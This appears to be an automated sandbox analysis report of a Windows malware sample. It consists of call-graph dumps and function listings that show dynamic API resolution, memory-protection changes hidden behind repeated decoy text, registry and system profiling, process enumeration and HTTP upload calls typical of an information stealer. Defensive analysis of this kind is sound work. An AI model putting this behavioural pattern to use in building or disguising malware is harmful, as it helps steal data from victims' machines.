14982->14983 14984 10050a0 InternetCloseHandle InternetCloseHandle 14983->14984 14985 100502a InternetReadFile 14983->14985 14986 10050ec 14984->14986 14985->14983 14986->13415 15710 10098d0 14987->15710 14989 1010759 14990 1010a38 14989->14990 14991 101077d 14989->14991 14992 1001590 lstrcpy 14990->14992 14994 1010799 StrCmpCA 14991->14994 14993 1010a49 14992->14993 15886 1010250 14993->15886 14996 10107a8 14994->14996 15021 1010843 14994->15021 14998 101a7a0 lstrcpy 14996->14998 15000 10107c3 14998->15000 14999 1010865 StrCmpCA 15001 1010874 14999->15001 15039 101096b 14999->15039 15002 1001590 lstrcpy 15000->15002 15003 101a740 lstrcpy 15001->15003 15004 101080c 15002->15004 15006 1010881 15003->15006 15007 101a7a0 lstrcpy 15004->15007 15005 101099c StrCmpCA 15008 1010a2d 15005->15008 15009 10109ab 15005->15009 15010 101a9b0 4 API calls 15006->15010 15011 1010823 15007->15011 15008->13419 15013 1001590 lstrcpy 15009->15013 15014 10108ac 15010->15014 15012 101a7a0 lstrcpy 15011->15012 15015 101083e 15012->15015 15016 10109f4 15013->15016 15017 101a920 3 API calls 15014->15017 15713 100fb00 15015->15713 15019 101a7a0 lstrcpy 15016->15019 15020 10108b3 15017->15020 15022 1010a0d 15019->15022 15023 101a9b0 4 API calls 15020->15023 15021->14999 15024 101a7a0 lstrcpy 15022->15024 15025 10108ba 15023->15025 15027 1010a28 15024->15027 15026 101a8a0 lstrcpy 15025->15026 15829 1010030 15027->15829 15039->15005 15361 101a7a0 lstrcpy 15360->15361 15362 1001683 15361->15362 15363 101a7a0 lstrcpy 15362->15363 15364 1001695 15363->15364 15365 101a7a0 lstrcpy 15364->15365 15366 10016a7 15365->15366 15367 101a7a0 lstrcpy 15366->15367 15368 10015a3 15367->15368 15368->14242 15370 10047c6 15369->15370 15371 1004838 lstrlen 15370->15371 15395 101aad0 15371->15395 15373 1004848 InternetCrackUrlA 15374 1004867 15373->15374 15374->14319 15376 101a740 lstrcpy 15375->15376 15377 1018b74 15376->15377 15378 101a740 lstrcpy 15377->15378 15379 1018b82 GetSystemTime 15378->15379 15381 1018b99 15379->15381 15380 101a7a0 lstrcpy 15382 1018bfc 15380->15382 15381->15380 15382->14334 15384 101a931 15383->15384 15385 101a988 15384->15385 15387 101a968 lstrcpy lstrcat 15384->15387 15386 101a7a0 lstrcpy 15385->15386 15388 101a994 15386->15388 15387->15385 15388->14337 15389->14452 15391 1009af9 LocalAlloc 15390->15391 15392 1004eee 15390->15392 15391->15392 15393 1009b14 CryptStringToBinaryA 15391->15393 15392->14340 15392->14342 15393->15392 15394 1009b39 LocalFree 15393->15394 15394->15392 15395->15373 15396->14462 15397->14603 15398->14605 15399->14613 15528 10177a0 15400->15528 15403 10176c6 RegOpenKeyExA 15405 1017704 RegCloseKey 15403->15405 15406 10176e7 RegQueryValueExA 15403->15406 15404 1011c1e 15404->14695 15405->15404 15406->15405 15408 1011c99 15407->15408 15408->14709 15410 1011e09 15409->15410 15410->14751 15412 1017a9a wsprintfA 15411->15412 15413 1011e84 15411->15413 15412->15413 15413->14765 15415 1011efe 15414->15415 15416 1017b4d 15414->15416 15415->14779 15535 1018d20 LocalAlloc CharToOemW 15416->15535 15419 101a740 lstrcpy 15418->15419 15420 1017bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15419->15420 15429 1017c25 15420->15429 15421 1017c46 GetLocaleInfoA 15421->15429 15422 1017d18 15423 1017d28 15422->15423 15424 1017d1e LocalFree 15422->15424 15425 101a7a0 lstrcpy 15423->15425 15424->15423 15428 1017d37 15425->15428 15426 101a9b0 lstrcpy lstrlen lstrcpy lstrcat 15426->15429 15427 101a8a0 lstrcpy 15427->15429 15428->14792 15429->15421 15429->15422 15429->15426 15429->15427 15431 1012008 15430->15431 15431->14807 15433 1019493 GetModuleFileNameExA CloseHandle 15432->15433 15434 10194b5 15432->15434 15433->15434 15435 101a740 lstrcpy 15434->15435 15436 1012091 15435->15436 15436->14822 15438 1012119 15437->15438 15439 1017e68 RegQueryValueExA 15437->15439 15438->14836 15440 1017e8e RegCloseKey 15439->15440 15440->15438 15442 1017fb9 GetLogicalProcessorInformationEx 15441->15442 15443 1018029 15442->15443 15444 1017fd8 GetLastError 15442->15444 15449 10189f0 2 API calls 15443->15449 15452 1018022 15444->15452 15453 1017fe3 15444->15453 15447 10189f0 2 API calls 15448 1012194 15447->15448 15448->14850 15450 101807b 15449->15450 15451 1018084 wsprintfA 15450->15451 15450->15452 15451->15448 15452->15447 15452->15448 15453->15442 15453->15448 15536 10189f0 15453->15536 15539 1018a10 GetProcessHeap RtlAllocateHeap 15453->15539 15455 101220f 15454->15455 15455->14864 15457 10189b0 15456->15457 15458 101814d GlobalMemoryStatusEx 15457->15458 15459 1018163 __aulldiv 15458->15459 15460 101819b wsprintfA 15459->15460 15461 1012289 15460->15461 15461->14878 15463 10187fb GetProcessHeap RtlAllocateHeap wsprintfA 15462->15463 15465 101a740 lstrcpy 15463->15465 15466 101230b 15465->15466 15466->14892 15468 101a740 lstrcpy 15467->15468 15474 1018229 15468->15474 15469 1018263 15471 101a7a0 lstrcpy 15469->15471 15470 101a9b0 lstrcpy lstrlen lstrcpy lstrcat 15470->15474 15472 10182dc 15471->15472 15472->14909 15473 101a8a0 lstrcpy 15473->15474 15474->15469 15474->15470 15474->15473 15476 101a740 lstrcpy 15475->15476 15477 101835c RegOpenKeyExA 15476->15477 15478 10183d0 15477->15478 15479 10183ae 15477->15479 15481 1018613 RegCloseKey 15478->15481 15482 10183f8 RegEnumKeyExA 15478->15482 15480 101a7a0 lstrcpy 15479->15480 15492 10183bd 15480->15492 15485 101a7a0 lstrcpy 15481->15485 15483 101843f wsprintfA RegOpenKeyExA 15482->15483 15484 101860e 15482->15484 15486 10184c1 RegQueryValueExA 15483->15486 15487 1018485 RegCloseKey RegCloseKey 15483->15487 15484->15481 15485->15492 15488 1018601 RegCloseKey 15486->15488 15489 10184fa lstrlen 15486->15489 15490 101a7a0 lstrcpy 15487->15490 15488->15484 15489->15488 15491 1018510 15489->15491 15490->15492 15493 101a9b0 4 API calls 15491->15493 15492->14935 15494 1018527 15493->15494 15495 101a8a0 lstrcpy 15494->15495 15496 1018533 15495->15496 15497 101a9b0 4 API calls 15496->15497 15498 1018557 15497->15498 15499 101a8a0 lstrcpy 15498->15499 15500 1018563 15499->15500 15501 101856e RegQueryValueExA 15500->15501 15501->15488 15502 10185a3 15501->15502 15503 101a9b0 4 API calls 15502->15503 15504 10185ba 15503->15504 15505 101a8a0 lstrcpy 15504->15505 15506 10185c6 15505->15506 15507 101a9b0 4 API calls 15506->15507 15508 10185ea 15507->15508 15509 101a8a0 lstrcpy 15508->15509 15510 10185f6 15509->15510 15510->15488 15512 101a740 lstrcpy 15511->15512 15513 10186bc CreateToolhelp32Snapshot Process32First 15512->15513 15514 10186e8 Process32Next 15513->15514 15515 101875d CloseHandle 15513->15515 15514->15515 15519 10186fd 15514->15519 15516 101a7a0 lstrcpy 15515->15516 15518 1018776 15516->15518 15517 101a9b0 lstrcpy lstrlen lstrcpy lstrcat 15517->15519 15518->14967 15519->15514 15519->15517 15520 101a8a0 lstrcpy 15519->15520 15520->15519 15522 101a7a0 lstrcpy 15521->15522 15523 10151b5 15522->15523 15524 1001590 lstrcpy 15523->15524 15525 10151c6 15524->15525 15540 1005100 15525->15540 15527 10151cf 15527->14979 15531 1017720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15528->15531 15530 10176b9 15530->15403 15530->15404 15532 1017780 RegCloseKey 15531->15532 15533 1017765 RegQueryValueExA 15531->15533 15534 1017793 15532->15534 15533->15532 15534->15530 15535->15415 15537 10189f9 GetProcessHeap HeapFree 15536->15537 15538 1018a0c 15536->15538 15537->15538 15538->15453 15539->15453 15541 101a7a0 lstrcpy 15540->15541 15542 1005119 15541->15542 15543 10047b0 2 API calls 15542->15543 15544 1005125 15543->15544 15700 1018ea0 15544->15700 15546 1005184 15547 1005192 lstrlen 15546->15547 15548 10051a5 15547->15548 15549 1018ea0 4 API calls 15548->15549 15550 10051b6 15549->15550 15551 101a740 lstrcpy 15550->15551 15552 10051c9 15551->15552 15553 101a740 lstrcpy 15552->15553 15554 10051d6 15553->15554 15555 101a740 lstrcpy 15554->15555 15556 10051e3 15555->15556 15557 101a740 lstrcpy 15556->15557 15558 10051f0 15557->15558 15559 101a740 lstrcpy 15558->15559 15560 10051fd InternetOpenA StrCmpCA 15559->15560 15561 100522f 15560->15561 15562 10058c4 InternetCloseHandle 15561->15562 15563 1018b60 3 API calls 15561->15563 15569 10058d9 ctype 15562->15569 15564 100524e 15563->15564 15565 101a920 3 API calls 15564->15565 15566 1005261 15565->15566 15567 101a8a0 lstrcpy 15566->15567 15568 100526a 15567->15568 15570 101a9b0 4 API calls 15568->15570 15573 101a7a0 lstrcpy 15569->15573 15571 10052ab 15570->15571 15572 101a920 3 API calls 15571->15572 15574 10052b2 15572->15574 15581 1005913 15573->15581 15575 101a9b0 4 API calls 15574->15575 15576 10052b9 15575->15576 15577 101a8a0 lstrcpy 15576->15577 15578 10052c2 15577->15578 15579 101a9b0 4 API calls 15578->15579 15580 1005303 15579->15580 15582 101a920 3 API calls 15580->15582 15581->15527 15583 100530a 15582->15583 15584 101a8a0 lstrcpy 15583->15584 15585 1005313 15584->15585 15586 1005329 InternetConnectA 15585->15586 15586->15562 15587 1005359 HttpOpenRequestA 15586->15587 15589 10058b7 InternetCloseHandle 15587->15589 15590 10053b7 15587->15590 15589->15562 15591 101a9b0 4 API calls 15590->15591 15592 10053cb 15591->15592 15593 101a8a0 lstrcpy 15592->15593 15594 10053d4 15593->15594 15595 101a920 3 API calls 15594->15595 15596 10053f2 15595->15596 15597 101a8a0 lstrcpy 15596->15597 15598 10053fb 15597->15598 15599 101a9b0 4 API calls 15598->15599 15600 100541a 15599->15600 15601 101a8a0 lstrcpy 15600->15601 15602 1005423 15601->15602 15603 101a9b0 4 API calls 15602->15603 15604 1005444 15603->15604 15605 101a8a0 lstrcpy 15604->15605 15606 100544d 15605->15606 15607 101a9b0 4 API calls 15606->15607 15608 100546e 15607->15608 15609 101a8a0 lstrcpy 15608->15609 15701 1018ead CryptBinaryToStringA 15700->15701 15702 1018ea9 15700->15702 15701->15702 15703 1018ece GetProcessHeap RtlAllocateHeap 15701->15703 15702->15546 15703->15702 15704 1018ef4 ctype 15703->15704 15705 1018f05 CryptBinaryToStringA 15704->15705 15705->15702 15709->14982 15952 1009880 15710->15952 15712 10098e1 15712->14989 15714 101a740 lstrcpy 15713->15714 15715 100fb16 15714->15715 15887 101a740 lstrcpy 15886->15887 15888 1010266 15887->15888 15889 1018de0 2 API calls 15888->15889 15890 101027b 15889->15890 15891 101a920 3 API calls 15890->15891 15892 101028b 15891->15892 15893 101a8a0 lstrcpy 15892->15893 15894 1010294 15893->15894 15895 101a9b0 4 API calls 15894->15895 15896 10102b8 15895->15896 15953 100988e 15952->15953 15956 1006fb0 15953->15956 15955 10098ad ctype 15955->15712 15959 1006d40 15956->15959 15960 1006d63 15959->15960 15971 1006d59 15959->15971 15960->15971 15973 1006660 15960->15973 15962 1006dbe 15962->15971 15979 10069b0 15962->15979 15964 1006e2a 15965 1006ee6 VirtualFree 15964->15965 15967 1006ef7 15964->15967 15964->15971 15965->15967 15966 1006f41 15968 10189f0 2 API calls 15966->15968 15966->15971 15967->15966 15969 1006f26 FreeLibrary 15967->15969 15970 1006f38 15967->15970 15968->15971 15969->15967 15972 10189f0 2 API calls 15970->15972 15971->15955 15972->15966 15976 100668f VirtualAlloc 15973->15976 15975 1006730 15977 1006743 VirtualAlloc 15975->15977 15978 100673c 15975->15978 15976->15975 15976->15978 15977->15978 15978->15962 15980 10069c9 15979->15980 15984 10069d5 15979->15984 15981 1006a09 LoadLibraryA 15980->15981 15980->15984 15982 1006a32 15981->15982 15981->15984 15987 1006ae0 15982->15987 15989 1018a10 GetProcessHeap RtlAllocateHeap 15982->15989 15984->15964 15985 1006a8b 15985->15984 15988 10189f0 2 API calls 15985->15988 15986 1006ba8 GetProcAddress 15986->15984 15986->15987 15987->15984 15987->15986 15988->15987 15989->15985

                        Executed Functions

                        Function 01019860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,018924E8), ref: 010198A1
                        • GetProcAddress.KERNEL32(74DD0000,018922A8), ref: 010198BA
                        • GetProcAddress.KERNEL32(74DD0000,01892308), ref: 010198D2
                        • GetProcAddress.KERNEL32(74DD0000,018923F8), ref: 010198EA
                        • GetProcAddress.KERNEL32(74DD0000,018923B0), ref: 01019903
                        • GetProcAddress.KERNEL32(74DD0000,018992B8), ref: 0101991B
                        • GetProcAddress.KERNEL32(74DD0000,018857D0), ref: 01019933
                        • GetProcAddress.KERNEL32(74DD0000,01885770), ref: 0101994C
                        • GetProcAddress.KERNEL32(74DD0000,018923C8), ref: 01019964
                        • GetProcAddress.KERNEL32(74DD0000,018922C0), ref: 0101997C
                        • GetProcAddress.KERNEL32(74DD0000,018923E0), ref: 01019995
                        • GetProcAddress.KERNEL32(74DD0000,01892398), ref: 010199AD
                        • GetProcAddress.KERNEL32(74DD0000,01885A10), ref: 010199C5
                        • GetProcAddress.KERNEL32(74DD0000,018924A0), ref: 010199DE
                        • GetProcAddress.KERNEL32(74DD0000,01892278), ref: 010199F6
                        • GetProcAddress.KERNEL32(74DD0000,01885910), ref: 01019A0E
                        • GetProcAddress.KERNEL32(74DD0000,01892410), ref: 01019A27
                        • GetProcAddress.KERNEL32(74DD0000,01892428), ref: 01019A3F
                        • GetProcAddress.KERNEL32(74DD0000,01885730), ref: 01019A57
                        • GetProcAddress.KERNEL32(74DD0000,01892290), ref: 01019A70
                        • GetProcAddress.KERNEL32(74DD0000,01885890), ref: 01019A88
                        • LoadLibraryA.KERNEL32(01892458,?,01016A00), ref: 01019A9A
                        • LoadLibraryA.KERNEL32(01892320,?,01016A00), ref: 01019AAB
                        • LoadLibraryA.KERNEL32(01892338,?,01016A00), ref: 01019ABD
                        • LoadLibraryA.KERNEL32(01892488,?,01016A00), ref: 01019ACF
                        • LoadLibraryA.KERNEL32(01892248,?,01016A00), ref: 01019AE0
                        • GetProcAddress.KERNEL32(75A70000,01892350), ref: 01019B02
                        • GetProcAddress.KERNEL32(75290000,018924D0), ref: 01019B23
                        • GetProcAddress.KERNEL32(75290000,01892380), ref: 01019B3B
                        • GetProcAddress.KERNEL32(75BD0000,01892218), ref: 01019B5D
                        • GetProcAddress.KERNEL32(75450000,01885750), ref: 01019B7E
                        • GetProcAddress.KERNEL32(76E90000,018991D8), ref: 01019B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 01019BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 01019BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 9a423691fb2a459f33f20ed36df30179c7715ce704573332749b05efd9e7e66a
                        • Instruction ID: 5658958373001c44b38bf761902d4a66f381f86f9c96149def5b08813f33c1b6
                        • Opcode Fuzzy Hash: 9a423691fb2a459f33f20ed36df30179c7715ce704573332749b05efd9e7e66a
                        • Instruction Fuzzy Hash: 25A11ABE5C52409FE378EFA8F99CA6A3BF9F788301704451AE60BC724CD6399441DB50
                        Function 010045C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 10045c0-1004695 RtlAllocateHeap 781 10046a0-10046a6 764->781 782 10046ac-100474a 781->782 783 100474f-10047a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0100460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0100479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010046CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0100475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010045D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0100466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010045E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010045F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010045C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010045DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010046D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0100477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0100462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010046AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0100471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0100474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0100473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 01004638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010046C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010046B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 2ba3fa57ee18da293cdc33cc042ffbc6f1b97aaf3c636d500aefae2addb85f72
                        • Instruction ID: 30a458fc0bc76bdf92281af5cf974990594f8046fc6912444d62a62e791bab14
                        • Opcode Fuzzy Hash: 2ba3fa57ee18da293cdc33cc042ffbc6f1b97aaf3c636d500aefae2addb85f72
                        • Instruction Fuzzy Hash: 5C41DA707C67346B8738BFA59CCEADE76765F46624F50504CEB405E380CAB06500CD2E
                        Function 01004880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 1004880-1004942 call 101a7a0 call 10047b0 call 101a740 * 5 InternetOpenA StrCmpCA 816 1004944 801->816 817 100494b-100494f 801->817 816->817 818 1004955-1004acd call 1018b60 call 101a920 call 101a8a0 call 101a800 * 2 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a920 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a920 call 101a8a0 call 101a800 * 2 InternetConnectA 817->818 819 1004ecb-1004ef3 InternetCloseHandle call 101aad0 call 1009ac0 817->819 818->819 905 1004ad3-1004ad7 818->905 829 1004f32-1004fa2 call 1018990 * 2 call 101a7a0 call 101a800 * 8 819->829 830 1004ef5-1004f2d call 101a820 call 101a9b0 call 101a8a0 call 101a800 819->830 830->829 906 1004ae5 905->906 907 1004ad9-1004ae3 905->907 908 1004aef-1004b22 HttpOpenRequestA 906->908 907->908 909 1004b28-1004e28 call 101a9b0 call 101a8a0 call 101a800 call 101a920 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 101a8a0 call 101a800 call 101a9b0 call 